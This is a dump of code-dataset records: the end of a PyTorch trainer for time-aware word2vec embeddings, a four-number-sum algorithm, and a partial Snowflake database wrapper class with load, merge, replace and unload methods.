plt.plot(embed[:,0],embed[:,1],names)\n\n # adjust_text(texts)\n # plt.legend()\n if platform == \"win32\":\n plt.show()\n else:\n plt.savefig(\"president-{}.pdf\".format(name),bbox_inches = \"tight\",pad_inches=0)\n plt.close()\n # plt.show()\n\n def get_sim_between_year(self,target,words= None,years = [i for i in range(1940,2020,1)], word2id= None,name = \"nuclear\"):\n name += \"-\"+target+\"_\".join(words)\n sims = []\n words.append(target)\n \n for year in years:\n embeddings = self.get_embedding_in_a_year(words,year)\n sim = cosine_similarity(embeddings[-1][np.newaxis,:],embeddings[:-1]).squeeze()\n # print(sim.shape)\n sims.append(sim)\n sims = np.array(sims)\n plt.figure(figsize = (10,10))\n for i in range(len(sims[0])):\n plt.plot(years,sims[:,i],label = words[i])\n plt.legend(loc='upper left')\n if platform == \"darwin_none\":\n plt.show()\n else:\n plt.savefig(\"{}.pdf\".format(name),bbox_inches = \"tight\",pad_inches=0)\n plt.close()\n \n\n\n def check_ssd(self,helper):\n\n from scipy.spatial.distance import cosine # cosine distance\n\n words = helper.words\n time_stamped_embeddings = []\n for timespan in helper.timespans:\n all_embeddings = [self.get_embedding_in_a_year(words, year) for year in timespan ]\n mean_embedding = np.mean(np.array(all_embeddings),0)\n time_stamped_embeddings.append(mean_embedding)\n assert len(time_stamped_embeddings) ==2 , \"more timespans than two\"\n scores = [cosine(time_stamped_embeddings[0][i],time_stamped_embeddings[1][i]) for i,word in enumerate(words)]\n print(scores)\n print(helper.evaluate(scores))\n\n\n\n\n\n\n\n\n\n def get_embedding_in_a_year(self,words= None, year = 0,word2id=None):\n if word2id is None:\n word2id = {value:key for key,value in self.id2word.items()}\n\n words_id = [word2id[word]for word in words]\n # print(\"___\"*20)\n \n word,time = torch.LongTensor(words_id),torch.LongTensor([year]*len(words_id))\n # print(time)\n # print(word)\n embeddings = self.skip_gram_model.forward_embedding(word,time).data.numpy()\n return embeddings\n\ndef load_model(model,filename = \"pytorch.bin\"):\n\n state_dict = torch.load(filename)\n print(filename)\n print(state_dict.keys())\n print(state_dict.__class__.__name__)\n exit()\n missing_keys, unexpected_keys, error_msgs = [], [], []\n prefix = \"\"\n metadata = getattr(state_dict,\"_metadata\",\"None\")\n state_dict = state_dict.copy()\n if metadata is not None:\n state_dict._metadata = metadata\n\n def load(module, prefix = ''):\n local_metadata = {} if metadata is None else metadata.get(prefix[:-1],{})\n module._load_from_state_dict(state_dict, prefix,local_metadata,True,missing_keys,unexpected_keys,error_msgs)\n for name,child in module._modules.items():\n if child is not None:\n load(child,prefix + name + \".\")\n start_prefix = \"\"\n load(model,prefix=start_prefix)\n\n if len(missing_keys) > 0:\n print(\"weights of {} not initialized from pretrained model: {}\".format(model.__class__.__name__,missing_keys))\n if len(unexpected_keys) > 0:\n print(\"weights of {} not used pretrained model: {}\".format(model.__class__.__name__,unexpected_keys))\n if len(error_msgs) > 0:\n print(\"errors in loading state_dict for {} : \\n{}\".format(model.__class__.__name__,error_msgs))\n return model\n\n\nclass Word2VecTrainer:\n def __init__(self, args):# input_file, output_file, emb_dimension=100, batch_size=32, window_size=5, iterations=3,initial_lr=0.01, min_count=25,weight_decay = 0, time_scale =1\n\n # self.data = DataReader(args.text, args.min_count)\n # if not args.use_time:\n # dataset = Word2vecDataset(self.data, args.window_size)\n # else:\n # dataset = TimestampledWord2vecDataset(self.data, args.window_size,args.time_scale)\n #\n # self.dataloader = DataLoader(dataset, batch_size=args.batch_size,\n # shuffle=True, num_workers=0, collate_fn=dataset.collate)\n self.data,self.dataloader = self.load_train(args) # self.data\n\n if \"train\" in args.text:\n test_filename = args.text.replace(\"train\",\"test\")\n if os.path.exists(test_filename):\n print(\"load test dataset: \".format(test_filename))\n self.test = self.load_train(args, data = self.data, filename=test_filename, is_train=False )\n else:\n self.test = None\n\n dev_filename = args.text.replace(\"train\", \"dev\")\n if os.path.exists(dev_filename):\n print(\"load dev dataset: \".format(dev_filename))\n self.dev = self.load_train(args, data = self.data, filename=dev_filename, is_train=False)\n else:\n self.dev = None\n else:\n self.dev, self.test = None, None\n\n \n if args.use_time:\n self.output_file_name = \"{}/{}\".format(args.output, args.time_type)\n if args.add_phase_shift:\n self.output_file_name += \"_shift\"\n else:\n self.output_file_name = \"{}/{}\".format(args.output, \"word2vec\")\n if not os.path.exists(args.output):\n os.mkdir(args.output)\n if not os.path.exists(self.output_file_name):\n os.mkdir(self.output_file_name)\n self.emb_size = len(self.data.word2id)\n self.emb_dimension = args.emb_dimension\n self.batch_size = args.batch_size\n self.iterations = args.iterations\n self.lr = args.lr\n self.time_type = args.time_type\n self.weight_decay = args.weight_decay\n\n print(args)\n\n\n if args.use_time:\n self.skip_gram_model = TimestampedSkipGramModel(self.emb_size, self.emb_dimension,time_type = args.time_type,add_phase_shift=args.add_phase_shift) \n else:\n self.skip_gram_model = SkipGramModel(self.emb_size, self.emb_dimension)\n\n self.use_cuda = torch.cuda.is_available()\n self.device = torch.device(\"cuda\" if self.use_cuda else \"cpu\")\n if self.use_cuda:\n print(\"using cuda and GPU ....\")\n self.skip_gram_model.cuda()\n\n # load_path = \"{}/{}\".format(self.output_file_name)\n # torch.save(self.skip_gram_model,\"pytorch.bin\")\n # self.skip_gram_model = torch.load(\"pytorch.bin\")\n # self.skip_gram_model = load_model(self.skip_gram_model,\"pytorch.bin\")\n # exit()\n if not args.from_scatch and os.path.exists(self.output_file_name):\n\n print(\"loading parameters ....\")\n self.skip_gram_model.load_embeddings(self.data.id2word,self.output_file_name)\n\n def load_train(self,args,data= None, filename = None, is_train = True):\n if data is None:\n assert is_train==True, \"wrong to load data 1\"\n data = DataReader(args.text, args.min_count)\n filename = args.text\n else:\n assert is_train == False, \"wrong to load test data 2\"\n assert filename is not None, \"wrong to load test data 3\"\n assert data is not None, \"wrong to load test data 4\"\n if not args.use_time:\n dataset = Word2vecDataset(data, input_text = filename, window_size= args.window_size)\n else:\n dataset = TimestampledWord2vecDataset(data,input_text = filename, window_size= args.window_size, time_scale=args.time_scale)\n\n dataloader = DataLoader(dataset, batch_size=args.batch_size,\n shuffle=is_train, num_workers=0, collate_fn=dataset.collate) # shuffle if it is train\n if is_train:\n return data,dataloader\n else:\n return dataloader\n\n def evaluation_loss(self,logger =None):\n results = []\n self.skip_gram_model.eval()\n print(\"evaluating ...\")\n for index,dataloader in enumerate([self.dev,self.test]):\n if dataloader is None:\n continue\n losses = []\n for i, sample_batched in enumerate(tqdm(dataloader)):\n if len(sample_batched[0]) > 1:\n\n pos_u = sample_batched[0].to(self.device)\n pos_v = sample_batched[1].to(self.device)\n neg_v = sample_batched[2].to(self.device)\n\n if args.use_time:\n time = sample_batched[3].to(self.device)\n # print(time)\n loss, pos, neg = self.skip_gram_model.forward(pos_u, pos_v, neg_v, time)\n else:\n\n loss, pos, neg = self.skip_gram_model.forward(pos_u, pos_v, neg_v)\n # print(loss)\n losses.append(loss.item())\n mean_result = np.array(losses).mean()\n results.append(mean_result)\n print(\"test{} loss is {}\".format(index, mean_result))\n logger.write(\"Loss in test{}: {} \\n\".format( index, str(mean_result)))\n logger.flush()\n\n self.skip_gram_model.train()\n return results\n\n def train(self):\n print(os.path.join(self.output_file_name,\"log.txt\"))\n if not os.path.exists(self.output_file_name):\n os.mkdir(self.output_file_name)\n optimizer = optim.Adam(self.skip_gram_model.parameters(), lr=self.lr, weight_decay=self.weight_decay)\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, len(self.dataloader)*self.iterations)\n\n\n with open(\"{}/log.txt\".format(self.output_file_name,\"log.txt\"),\"w\") as f:\n for iteration in range(self.iterations):\n\n print(\"\\nIteration: \" + str(iteration + 1))\n f.write(str(args) +\"\\n\")\n # optimizer = optim.SparseAdam(self.skip_gram_model.parameters(), lr=self.initial_lr)\n\n\n running_loss = 0.0\n for i, sample_batched in enumerate(tqdm(self.dataloader)):\n if len(sample_batched[0]) > 1:\n\n pos_u = sample_batched[0].to(self.device)\n pos_v = sample_batched[1].to(self.device)\n neg_v = sample_batched[2].to(self.device)\n\n optimizer.zero_grad()\n if args.use_time:\n time = sample_batched[3].to(self.device)\n # print(time)\n loss,pos,neg = self.skip_gram_model.forward(pos_u, pos_v, neg_v,time)\n else:\n\n loss,pos,neg = self.skip_gram_model.forward(pos_u, pos_v, neg_v)\n # print(loss)\n\n loss.backward()\n optimizer.step()\n scheduler.step()\n\n\n\n loss,pos,neg = loss.item(),pos.item(),neg.item()\n\n if i % args.log_step == 0: # i > 0 and\n f.write(\"Loss in {} steps: {} {}, {}\\n\".format(i,str(loss),str(pos),str(neg)))\n\n if not torch.cuda.is_available() or i % (args.log_step*10) == 0 :\n print(\"Loss in {} steps: {} {}, {}\\n\".format(i,str(loss),str(pos),str(neg)))\n self.evaluation_loss(logger=f)\n epoch_path = os.path.join(self.output_file_name,str(iteration))\n if not os.path.exists(epoch_path):\n os.mkdir(epoch_path)\n\n torch.save(self.skip_gram_model, os.path.join( epoch_path,\"pytorch.bin\") )\n\n self.skip_gram_model.save_embedding(self.data.id2word, os.path.join(self.output_file_name,str(iteration)))\n self.skip_gram_model.save_in_text_format(self.data.id2word,\n os.path.join(self.output_file_name, str(iteration)))\n self.skip_gram_model.save_in_text_format(self.data.id2word,self.output_file_name)\n\n\n torch.save(self.skip_gram_model, os.path.join(self.output_file_name,\"pytorch.bin\") )\n with open(os.path.join(self.output_file_name,\"config.json\"), \"wt\") as f:\n json.dump(vars(args), f, indent=4)\n self.skip_gram_model.save_dict(self.data.id2word,self.output_file_name)\n\n\n\ndef get_sim_words(checker, words, years,real_years, k = 100 ):\n simwords = []\n for year in years:\n simwords.append(checker.get_similar_words(words = words, year = year, k = k))\n\n # base_year = 1810 if \"coha\" in checker.path else 1990\n # real_years = [str(year + base_year) for year in years]\n #\n # if \"arxiv\" in checker.path:\n # real_years = [\"{}-{}\".format( (year-4)//12 +2007, (year-4)%12 ) for year in years]\n\n lines = [\"{} \".format(checker.path)]\n for row in range(len(simwords[0])):\n line = [real_years[i] + \" : \" + simword[row] for i,simword in enumerate(simwords)]\n print(line)\n print(\"--\"*20)\n lines.extend(line)\n return \"\\n\".join(lines)\n\n\ncheck_list = [ (\"president\", [ \"nixon\",\"ford\",\"carter\", \"reagan\",\"clinton\", \"bush\" , \"obama\", \"trump\", \"biden\"]),\n (\"olympic\", [ \"moscow\", \"los\", \"angeles\", \"seoul\", \"barcelona\",\"atlanta\",\"sydney\",\"athens\", \"beijing\", \"london\", \"rio\", \"tokyo\"]),\n (\"nuclear\", [ \"technology\",\"threaten\",\"america\", \"russian\",\"cuba\", \"green\" , \"energy\",\"china\"]),\n (\"nuclear\", [ \"russian\",\"japan\", \"weapon\" , \"energy\", \"ukrainian\", \"soviet\"]),\n (\"olympic\", [\"sydney\",\"athens\", \"beijing\", \"london\", \"rio\", \"tokyo\"]),\n (\"president\", [ \"clinton\", \"bush\" , \"obama\", \"trump\", \"biden\"]),\n]\n\n\n\ncoha_words = [\"apple\", \"amazon\" , \"dna\", \"innovation\" , \"data\" , \"app\", \"twitter\", \"ranking\",\"quantum\", \"nuclear\",\"weapon\", \"president\" , \"chairman\" ,\"soviet\", \"reagan\", \"trump\", \"biden\", \"obama\", \"olympic\", \"olympics\", \"china\",\"america\",\"ai\", \"artificial\", \"intelligence\", \"neural\", \"network\", \"language\", \"model\",\"information\", \"retrieval\"]\nwords = coha_words + [\"iphone\", \"mp3\"]\n\ndef draw_figure():\n for output in [\"coha.txt.raw.token-output/\", \"coca.txt.raw.token-output/\", \"arxiv.txt.raw.token-output/\"]:\n if \"coca\" in output:\n years = [i-1990 for i in range(1990, 2020, 1)]\n else:\n years = [i-1810 for i in range(1810, 2020, 1)]\n for time_type in [\"word_mixed_fixed\", \"word_cos\"]: # \"word_cos\",\n for epoch in range(1,10,1):\n args.iterations = epoch\n try:\n checker = Word2VecChecker(path=output, time_type=time_type)\n for target, checked_words in check_list:\n # checker.plot_words_in_many_years(words=[target] + checked_words[-9:], years=years,\n # name=\"{}-{}\".format(output.split(\".\")[0], time_type))\n checker.get_sim_between_year(target, checked_words[-9:],\n name=\"{}-{}-{}-\".format(output.split(\".\")[0], time_type,epoch), years=years)\n except Exception as e:\n print(e)\n\n\ntimetypes = [\"cos\" , \"linear_shift\", \" mixed_shift\", \"sin_shift\", \"word_cos\", \"word_linear_shift\", \"word_mixed_fixed\", \"word_mixed_shift\", \"word_sin_shift\",\n\"cos_shift mixed\", \"others_shift\", \"word2vec\", \"word_cos_shift\", \"word_mixed\", \"word_mixed_fixed_shift\", \"word_sin\"]\n\n\ndef check_ssd():\n from data.ssd import Helper\n\n helper = Helper(\"data/grade.txt\")\n for time_type in timetypes: # [ \"word_sin\" ,\"word_cos\", \"word_cos_shift\", \"word_cos_shift\" ,\"word_mixed_fixed\",\"cos\",\"cos_shift\",\"\"]: #\n for epoch in range(10):\n try:\n print(time_type, epoch, \"-\" * 20 + \"\\n\")\n args.iterations = epoch\n checker = Word2VecChecker(path=\"coha.txt.raw.token-output/\", time_type=time_type)\n checker.check_ssd(helper)\n except Exception as e:\n print(e)\n\ndef sim_words_over_time(model_path,words,epoches = 10,dataset=\"none\",years =()):\n\n years, real_years = years\n\n for time_type in [\"word_mixed_fixed\"]: # \"word_cos\", , \"word_cos\"\n epoches = 10 if \"mixed_fixed\" in time_type else 5\n\n for epoch in range(1,epoches,1):\n save_filename = \"{}-{}-{}-sim_word_log.txt\".format(dataset, epoch, time_type)\n print(\"save log in {}\".format(save_filename))\n with open(save_filename, \"w\", encoding=\"utf-8\") as f:\n args.iterations = epoch\n checker = Word2VecChecker(path=model_path, time_type=time_type)\n log_text = get_sim_words(checker, words, years,real_years)\n print(log_text)\n\n f.write(log_text + \"\\n\")\n # exit()\n\n\n\nwords = [\"dna\", \"innovazione\", \"invecchiamento\", \"anziano\", \"vaccino\", \"spaziale\", \"coronavirus\", \"pandemia\",\"mascherina\", \"vaccino\", \"test\", \"respiratore\"]\n\n\nif __name__ == '__main__':\n \n if args.do_eval:\n # draw_figure()\n for model_path,(years, real_years) in year_mapping.items():\n sim_words_over_time(model_path,words, dataset=model_path.split(\"-\")[0], years=(years, real_years))\n # if \"coha\" in model_path:\n # sim_words_over_time(model_path,coha_words,dataset = model_path.split(\"-\")[0], years =(years, real_years) )\n # else:\n # sim_words_over_time(model_path,words,dataset = model_path.split(\"-\")[0],years =(years, real_years))\n # checker.word_change_rate(words, years =args.years)\n else:\n w2v = Word2VecTrainer(args)\n #input_file = args.text, output_file = args.output, batch_size = args.batch_size, initial_lr = args.lr, weight_decay = args.weight_decay, iterations = args.iterations, time_scale = args.time_scale\n w2v.train()\n\n # embeddings = checker.get_embedding_in_a_year(words = \"network\", year =1990)\n","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":27898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"334526932","text":"#Sample Input : [7,6,4,-1,1,2],16\n#Sample Output : [[7,6,4,-1],[7,6,1,2]]\n\n#AverageTime : O(N^2) and Space : O(N^2)\n\n#fourNumberSum Function will return a 2d-array of quadruplets that sum up to a given target value \ndef fourNumberSum(array, targetSum):\n\tpairSums = {}\n\tquadruplets = []\n\t\n\tfor i in range(1,len(array)-1):\n\t\t\n\t\tfor j in range(i+1,len(array)):\n\t\t\tcurrentSum = array[i] + array[j]\n\t\t\tdiff = targetSum - currentSum\n\t\t\tif diff in pairSums:\n\t\t\t\tfor pair in pairSums[diff]:\n\t\t\t\t quadruplets.append(pair + [array[i], array[j]])\n\t\t\t\t\t\n\t\tfor k in range(0,i):\n\t\t\tcurrentSum = array[k] + array[i]\n\t\t\tif currentSum not in pairSums:\n\t\t\t\tpairSums[currentSum] = [[array[k],array[i]]]\n\t\t\telse:\n\t\t\t\tpairSums[currentSum].append([array[k],array[i]])\n\treturn quadruplets\n\nif __name__ == '__main__':\n targetValue = int(input())\n arr = list(map(int,input().split()))\n result = fourNumberSum(arr, targetValue)\n for pair in result:\n \tprint(pair)","sub_path":"Arrays/fourNumberSum.py","file_name":"fourNumberSum.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"427072779","text":"from __future__ import print_function\nimport sys\nimport pandas as pd\nimport snowflake.connector\nfrom bi_db.bi_exceptions import SnowflakeException\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.pool import NullPool\nfrom snowflake.sqlalchemy import URL\nfrom datetime import datetime\nfrom bi_tools import flex_read\nfrom bi_tools import flex_write\n\nfrom s3_buckets import S3Buckets\ns3_snowflake = S3Buckets().snowflake\nfrom biz_intel_creds import CredsList\nsnowflake_creds = CredsList().snowflake\n\nclass SnowflakeConnection(object):\n def __init__(self):\n \"\"\"Snowflake Database Connection. Wrapper library designed and built\n to help users run database operations on Snowflake more easily.\n\n Args:\n NA\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n self.connection = snowflake.connector.connect(\n user=snowflake_creds['USER'],\n password=snowflake_creds['PASSWORD'],\n account=snowflake_creds['ACCOUNT'],\n role=\"ACCOUNTADMIN\"\n )\n self.engine = self.connection.cursor()\n\n def write_to_sql(self, df, schema_name, table_name,\n db_name=s3_snowflake[\"database_name\"],**kwargs):\n \"\"\"Writes records stored in a DataFrame to Snowflake database.\n\n Args:\n db_name: name of the database in snowflake\n\n schema_name: name of the schema in snowflake\n\n table_name: name of the table in snowflake\n\n kwargs: [\"if_exists\"]\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n # check to see if `if_exists` key argument was passed in\n try:\n kwargs[\"if_exists\"]\n if kwargs[\"if_exists\"] not in [\"fail\", \"replace\", \"append\"]:\n raise SnowflakeException(\"`if_exists` should be one of\"\\\n \"[`fail`, `replace`, `append`]\")\n else:\n if_exists = kwargs[\"if_exists\"]\n except NameError:\n if_exists = \"append\"\n except KeyError:\n if_exists = \"append\"\n\n custom_engine = self._create_custom_engine(db_name, schema_name)\n df = self._format_for_load(df)\n capitalize_columns_dict = {i: i.upper() for i in df.columns.tolist()}\n df = df.rename(columns=capitalize_columns_dict)\n df.to_sql(name=table_name, con=custom_engine, if_exists=if_exists,\n index=False, chunksize=1000)\n\n def load(self, schema_name, table_name,\n filepath, format , db_name=s3_snowflake[\"database_name\"]):\n \"\"\"Loads s3 object into Snowflake.\n\n Args:\n db_name: name of the database in snowflake\n\n schema_name: name of the schema in snowflake\n\n table_name: name of the table in snowflake\n\n filepath: filepath of the s3 object\n\n format: format of the s3 object\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n bucket = self._get_bucket(filepath)\n if format.upper() == \"CSV\":\n format = \"comma_delimited\"\n elif format.upper() == \"JSON\":\n raise SnowflakeException(\"format not supported\")\n elif format.upper() == \"GZIP\":\n raise SnowflakeException(\"format not supported\")\n else:\n raise SnowflakeException(\"format not supported\")\n\n bucket_name = bucket[\"bucket_name\"]\n\n if \".gz\" in filepath:\n gz_df = flex_read(filepath, s3=True, bucket_name=bucket_name)\n import random\n random_num = random.randint(1,101)\n filepath = \"{prefix}/tempfile/tempfile_{num}\".format(\n prefix=s3_snowflake[\"prefix\"], num=random_num)\n flex_write(gz_df, filepath, s3=True)\n\n load_query = \"\"\"\n COPY INTO {schema}.{table} FROM {filepath}\n FILE_FORMAT = (FORMAT_NAME='{format}')\n ON_ERROR = CONTINUE\n force=true;\n \"\"\".format(schema=schema_name,\n table=table_name,\n filepath=filepath.replace(bucket[\"prefix\"],\n bucket[\"stage\"]),\n format=format)\n if self._table_exists(table_name, schema_name, db_name):\n self.query_executor(\"USE SCHEMA {}.{}\".format(db_name, \"PUBLIC\"))\n self.query_executor(load_query)\n self.query_executor(\"COMMIT\")\n else:\n df = flex_read(filepath, s3=True,\n bucket_name=bucket[\"bucket_name\"], nrows=500)\n self.engine.execute(\"USE SCHEMA {db_name}.{schema}\".format(\n db_name=db_name,\n schema=schema_name\n )\n )\n self.write_to_sql(df=df, db_name=db_name,\n schema_name=schema_name, table_name=table_name,\n if_exists=\"replace\"\n )\n self.query_executor(\"USE SCHEMA {}.{}\".format(\n db_name, schema_name\n )\n )\n self.query_executor(\"DELETE FROM {}\".format(table_name))\n self.query_executor(\"USE SCHEMA {}.{}\".format(db_name, \"PUBLIC\"))\n self.query_executor(load_query)\n self.query_executor(\"COMMIT\")\n self._grant_permission(db_name, schema_name)\n\n def append(self, schema_name, table_name,\n filepath, format=\"csv\", db_name=s3_snowflake[\"database_name\"]):\n \"\"\"Bulk appends s3 object into Snowflake.\n\n Args:\n db_name: name of the database in snowflake\n\n schema_name: name of the schema in snowflake\n\n table_name: name of the table in snowflake\n\n filepath: filepath of the s3 object\n\n format: format of the s3 object\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n # default bulk load is bulk append\n self.load(schema_name, table_name,\n filepath, format, db_name)\n\n def update(self, schema_name, table_name, filepath, update_on,\n format=\"comma_delimited\", db_name=s3_snowflake[\"database_name\"]):\n \"\"\"Bulk upserts s3 object into Snowflake.\n\n Args:\n db_name: name of the database in snowflake\n\n schema_name: name of the schema in snowflake\n\n table_name: name of the table in snowflake\n\n update_on: name of the column to update on\n\n filepath: filepath of the s3 object\n\n format: format of the s3 object\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n bucket = self._get_bucket(filepath)\n # create staging_{destination_table_name}\n # and upload to staging\n staging_name = \"STAGING_\" + table_name\n df = flex_read(filepath, s3=True,\n bucket_name=bucket[\"bucket_name\"], nrows=5)\n\n column_list = df.columns.tolist()\n update_column_match_string = ', '.join(\n \"{column} = {schema}.{temp_table}.{column}\".format(\n column=i, temp_table=staging_name,\n schema=schema_name) for i in column_list)\n temp_column_string = ', '.join(\n \"{schema}.{temp_table}.{column}\".format(\n column=i, temp_table=staging_name,\n schema=schema_name) for i in column_list)\n prod_column_string = ', '.join(\n \"{column}\".format(\n column=i) for i in column_list)\n self.query_executor(\"USE DATABASE {}\".format(db_name))\n create_temp_table_query = \\\n \"\"\"CREATE TEMPORARY TABLE {schema}.{temp_table}\n LIKE {schema}.{table};\"\"\".format(\n schema=schema_name\n , table=table_name\n , temp_table=staging_name)\n load_temp_query = \"\"\"COPY INTO {schema}.{temp_table}({prod_columns})\n FROM {filepath}\n FILE_FORMAT = (FORMAT_NAME='{format_name}'\n ESCAPE_UNENCLOSED_FIELD=NONE);\"\"\".format(\n schema=schema_name\n , temp_table=staging_name\n , prod_columns=prod_column_string\n , filepath=filepath.replace(\n bucket[\"prefix\"],\n bucket[\"stage\"])\n , format_name=format)\n merge_query = \\\n \"\"\"MERGE INTO {schema}.{table}\n USING {schema}.{temp_table}\n ON {schema}.{table}.{update_on} = {schema}.{temp_table}.{update_on}\n WHEN MATCHED THEN UPDATE SET {update_column_match_string}\n WHEN NOT MATCHED THEN INSERT({prod_columns}) VALUES({temp_columns});\"\"\".\\\n format(\n schema=schema_name\n , table=table_name\n , temp_table=staging_name\n , update_on=update_on\n , update_column_match_string=update_column_match_string\n , prod_columns=prod_column_string\n , temp_columns=temp_column_string)\n self.query_executor(\"USE SCHEMA {}.{};\".format(db_name, \"PUBLIC\"))\n self.query_executor(create_temp_table_query)\n self.query_executor(load_temp_query)\n self.query_executor(merge_query)\n\n def replace(self, schema_name, table_name,\n filepath, format=\"csv\", db_name=s3_snowflake[\"database_name\"]):\n \"\"\"Bulk replaces s3 object into Snowflake.\n\n Args:\n db_name: name of the database in snowflake\n\n schema_name: name of the schema in snowflake\n\n table_name: name of the table in snowflake\n\n filepath: filepath of the s3 object\n\n format: format of the s3 object\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n # write staging\n staging_table_name = table_name.upper() + \"_STAGING\"\n self.query_executor(\"USE SCHEMA {db}.{sn}\".format(\n db=db_name, sn=schema_name\n )\n )\n self.load(schema_name, staging_table_name,\n filepath, format, db_name\n )\n # change table names\n self.query_executor(\"USE SCHEMA {db}.{sn}\".format(\n db=db_name, sn=schema_name\n )\n )\n self.query_executor(\"ALTER TABLE {tn} RENAME TO {gn}\".format(\n tn=table_name, gn=\"garbage\"\n )\n )\n self.query_executor(\"ALTER TABLE {stn} RENAME TO {tn}\".format(\n stn=staging_table_name, tn=table_name\n )\n )\n # drop the old table\n self.query_executor(\"DROP TABLE {gn}\".format(gn=\"garbage\"))\n\n def create(self, object_name, object_type=None, **kwargs):\n \"\"\"Creates a database object.\n\n Args:\n object_name: name of the object you are creating\n\n object_type: (DATABASE, SCHEMA, WAREHOUSE, TABLE)\n\n DATABASE(key argument): name of the database\n\n SCHEMA(key argument): name of the schema\n\n df(key argument): dataframe you want to create the table with\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n if \"DATABASE\" in kwargs:\n db_name = kwargs[\"DATABASE\"]\n if \"SCHEMA\" in kwargs:\n schema_name = kwargs[\"SCHEMA\"]\n\n if object_type is None:\n raise SnowflakeException(\"object type must be one of \"\\\n \"['DATABASE', 'SCHEMA',\" \\\n \"'WAREHOUSE', 'TABLE']\"\n )\n elif object_type.upper() in [\"DATABASE\", \"WAREHOUSE\"]:\n self.engine.execute(\"CREATE {ot} IF NOT EXISTS {on}\".format(\n ot=object_type, on=object_name\n )\n )\n elif object_type.upper() == \"SCHEMA\":\n self.engine.execute(\"USE DATABASE {db_name}\".format(\n db_name=kwargs[\"DATABASE\"]\n )\n )\n self.engine.execute(\"CREATE {ot} IF NOT EXISTS {on}\".format(\n ot=object_type, on=object_name\n )\n )\n self._grant_permission(kwargs[\"DATABASE\"], object_name)\n elif object_type.upper() == \"TABLE\":\n self.engine.execute(\"USE SCHEMA {db_name}.{schema}\".format(\n db_name=kwargs[\"DATABASE\"],\n schema=kwargs[\"SCHEMA\"]\n )\n )\n # default append creates the table\n today = datetime.strftime(datetime.today(), \"%Y-%m-%d\")\n savepath = \\\n \"{prefix}/schema={schema}\"\\\n \"/table={table}/{today}/{schema}_{table}.csv\".format(\n prefix=s3_snowflake[\"prefix\"], schema=kwargs[\"SCHEMA\"],\n table=object_name, today=today)\n\n flex_write(kwargs[\"df\"], savepath,s3=True)\n self.append(schema_name=kwargs[\"SCHEMA\"], table_name=object_name,\n filepath=savepath)\n\n def unload(self, database, schema, table, **kwargs):\n \"\"\"Unloads a database table into a specified s3 location\n\n Args:\n database: name of the database\n\n schema_name: name of the schema\n\n table_name: name of the table\n\n s3_path: filepath of the s3 object\n\n kwargs: [\"aws_access_key_id\", \"aws_secret_access_key\"]\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n schema = schema.upper()\n table = table.upper()\n try:\n kwargs[\"s3_path\"]\n s3_path = kwargs[\"s3_path\"]\n except NameError:\n today = datetime.strftime(datetime.today(), \"%Y-%m-%d\")\n s3_path = \"{prefix}/schema={schema}/table={table}/\"\\\n \"{today}\".format(prefix=s3_snowflake[\"prefix\"], schema=schema,\n table=table, today=today)\n except KeyError:\n today = datetime.strftime(datetime.today(), \"%Y-%m-%d\")\n s3_path = \"{prefix}/schema={schema}/table={table}/\"\\\n \"{today}\".format(prefix=s3_snowflake[\"prefix\"], schema=schema,\n table=table, today=today)\n if set([\"aws_access_key_id\", \"aws_secret_access_key\"]) < \\\n set(list(kwargs)):\n aws_key_given = True\n else:\n aws_key_given = False\n if not aws_key_given:\n sql=\"\"\"\n UNLOAD \\\n('select * from {database}.{schema}.{table}') TO '{s3path}/{schema}_{table}' \\\n CREDENTIALS\n 'aws_iam_role=arn:aws:iam::542960883369:role/redshift_access_role' \\\n DELIMITER AS ',' \\\n ADDQUOTES \\\n NULL AS '' \\\n ALLOWOVERWRITE \\\n PARALLEL OFF;\"\"\"\\\n .format(database=database,\n schema=schema,\n table=table,\n s3path=s3_path)\n elif aws_key_given:\n sql=\"\"\"\n UNLOAD \\\n('select * from {database}.{schema}.{table}') TO '{s3path}/{schema}_{table}' \\\n CREDENTIALS\n 'aws_access_key_id={aki};aws_secret_access_key={sck}' \\\n DELIMITER AS ',' \\\n ADDQUOTES \\\n NULL AS '' \\\n ALLOWOVERWRITE \\\n PARALLEL OFF;\"\"\"\\\n .format(database=database,\n schema=schema,\n table=table,\n s3path=s3_path,\n aki=kwargs[\"aws_access_key_id\"],\n sck=kwargs[\"aws_secret_access_key\"])\n #logger.custom_log(\"Unloading your table\")\n self.query_executor(sql)\n\n df = self.sql_dataframe(\"select * from {}.{}.{} limit 3;\".format(\n database, schema, table))\n df = pd.DataFrame(df.columns)\n df.rename(columns={0:\"column_name\"}, inplace=True)\n flex_write(df, s3_path + \"/column_names.csv\", \"csv\", s3=True)\n\n\n def get_metadata(self, db_name, schema_name, table_name):\n \"\"\"Gets and returns the metadata table.\n\n Args:\n database: name of the database\n\n schema: name of the schema\n\n table: name of the table\n Returns:\n metadata: list of metadata of each field\n Raises:\n NA\n \"\"\"\n self.engine.execute(\"SELECT * FROM {}.{}.{} limit 5\"\\\n .format(db_name, schema_name, table_name))\n return ','.join([col[0] for col in self.engine.description])\n\n def get_query_id(self, query_order=-1):\n \"\"\"Gets and returns the query_id.\n\n Args:\n query_order: the order of the query_id being fetched\n Returns:\n query_id: the id the of the query\n Raises:\n SnowflakeException\n \"\"\"\n df = pd.read_sql(sql=\"select last_query_id({ord})\"\\\n .format(ord=query_order),con=self.connection)\n return df[\"LAST_QUERY_ID({ord})\".format(ord=query_order)][0]\n\n def cancel_query(self, query_id):\n \"\"\"Cancels the query associated with the given query id.\n\n Args:\n query_id: the of query you want to cancel\n Returns:\n NA\n Raises:\n SnowflakeException\n \"\"\"\n try:\n self.engine.execute(r\"select SYSTEM$CANCEL_QUERY('{queryID}')\"\\\n .format(queryID=query_id))\n except:\n raise SnowflakeException(\"Cannot cancel query_id:{}\"\\\n .format(query_id))\n\n def query_executor(self, query):\n \"\"\"Executes the query.\n\n Args:\n 